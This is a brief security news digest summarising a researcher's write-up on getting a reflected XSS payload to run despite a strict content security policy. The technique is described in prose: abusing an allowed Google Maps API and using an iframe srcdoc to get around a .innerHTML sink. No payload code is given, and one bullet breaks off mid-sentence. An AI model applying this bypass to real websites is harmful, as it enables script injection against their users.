Fast Feed

Vaulting over a .innerHTML sink in a Locked-Down CSP

1 min read

Summary

  • Young Bangladeshi, Syed Mushfik Hasan Tahsin, has shared an interesting tale of an unexpected roadblock when attempting to exploit a finding.
  • While investigating a target site, he discovered an unprotected input point which, when exploited, delivered a perfect reflection of his XSS payload.
  • Thinking he’d scored a simple victory, Tahsin was surprised to discover that the target website utilised a robust content security policy (CSP) which blocked the expected popup.
  • Analyising the CSP, Tahsin found that while the policy forbade the use of the unsafe-inline tag, he was able to exploit a Google Maps API to deliver his XSS successfully.
  • However, the payload still would not execute – it turned out that the XSS exploit had been sunk using the .innerHTML property, which renders the
  • The only way to get around this was to use an iframe srcdoc attribute to deliver the <script> tag, which then could access the parent document and deliver the popup.

By SMHTahsin33

Original Article